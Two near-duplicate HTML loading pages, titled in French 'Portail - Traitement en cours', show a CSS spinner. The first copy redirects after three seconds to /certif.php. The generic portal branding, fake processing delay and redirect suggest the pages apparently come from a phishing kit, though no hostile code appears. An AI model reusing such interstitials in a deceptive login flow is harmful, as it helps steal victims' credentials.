

<html>
<meta http-equiv="refresh" content="3;URL=/certif.php">


<style>

.a {
    
    animation: pulse 1s linear infinite;
}

@-webkit-keyframes "pulse" {
0% {
   -webkit-transform: scale(1.1);
   transform: scale(1.1);
}
50% {
  -webkit-transform: scale(0.8);
  transform: scale(0.8);
}
100% {
   -webkit-transform: scale(1);
  transform: scale(1);
}
}
  </style>

<head>
  <title>Portail - Traitement en cours</title>
      <meta name="viewport" content="width=device-width"/>
      <link rel="shortcut icon" href="../assets/img/favicon.ico" type="image/vnd.microsoft.icon">
  </head>
  <body>
   <center> <img class="a" style="width: 70px; margin-top: 250px; margin-right: 15px;" src="img/avatar.png"></center>
    <center>

      <div style="margin-top: 50px;" class="loadingio-spinner-rolling-1foafbztm83"><div class="ldio-kwlss8n4oxj">
<div></div>
</div></div></center>
<style type="text/css">
@keyframes ldio-kwlss8n4oxj {
  0% { transform: translate(-50%,-50%) rotate(0deg); }
  100% { transform: translate(-50%,-50%) rotate(360deg); }
}
.ldio-kwlss8n4oxj div {
  position: absolute;
  width: 40px;
  height: 40px;
  border: 10px solid #024ea3;
  border-top-color: transparent;
  border-radius: 50%;
}
.ldio-kwlss8n4oxj div {
  animation: ldio-kwlss8n4oxj 1s linear infinite;
  top: 50px;
  left: 50px
  margin-right: 17;
}
.loadingio-spinner-rolling-1foafbztm83 {
  width: 60px;
  height: 60px;
  display: inline-block;
  overflow: hidden;
  margin-right:17;
  background: #ffffff;
}
.ldio-kwlss8n4oxj {
  width: 100%;
  height: 100%;
  position: relative;
  transform: translateZ(0) scale(0.6);
  backface-visibility: hidden;
  transform-origin: 0 0; /* see note above */
}
.ldio-kwlss8n4oxj div { box-sizing: content-box; }
/* generated by https://loading.io/ */
</style>

  </body>

</html>




<html>

<style>

.a {
    
    animation: pulse 1s linear infinite;
}

@-webkit-keyframes "pulse" {
0% {
   -webkit-transform: scale(1.1);
   transform: scale(1.1);
}
50% {
  -webkit-transform: scale(0.8);
  transform: scale(0.8);
}
100% {
   -webkit-transform: scale(1);
  transform: scale(1);
}
}
  </style>

<head>
  <title>Portail - Traitement en cours</title>
      <meta name="viewport" content="width=device-width"/>
      <link rel="shortcut icon" href="../assets/img/favicon.ico" type="image/vnd.microsoft.icon">
  </head>
  <body>
    <center>

      <div style="margin-top: 50px;" class="loadingio-spinner-rolling-1foafbztm83">
<div></div>
</div></div></center>
<style type="text/css">
@keyframes ldio-kwlss8n4oxj {
  0% { transform: translate(-50%,-50%) rotate(0deg); }
  100% { transform: translate(-50%,-50%) rotate(360deg); }
}
.ldio-kwlss8n4oxj div {
  position: absolute;
  width: 40px;
  height: 40px;
  border: 10px solid #024ea3;
  border-top-color: transparent;
  border-radius: 50%;
}
.ldio-kwlss8n4oxj div {
  animation: ldio-kwlss8n4oxj 1s linear infinite;
  top: 50px;
  left: 50px
}
.loadingio-spinner-rolling-1foafbztm83 {
  width: 60px;
  height: 60px;
  display: inline-block;
  overflow: hidden;
  background: #ffffff;
}
.ldio-kwlss8n4oxj {
  width: 100%;
  height: 100%;
  position: relative;
  transform: translateZ(0) scale(0.6);
  backface-visibility: hidden;
  transform-origin: 0 0; /* see note above */
}
.ldio-kwlss8n4oxj div { box-sizing: content-box; }
/* generated by https://loading.io/ */
</style>

  </body>

</html>


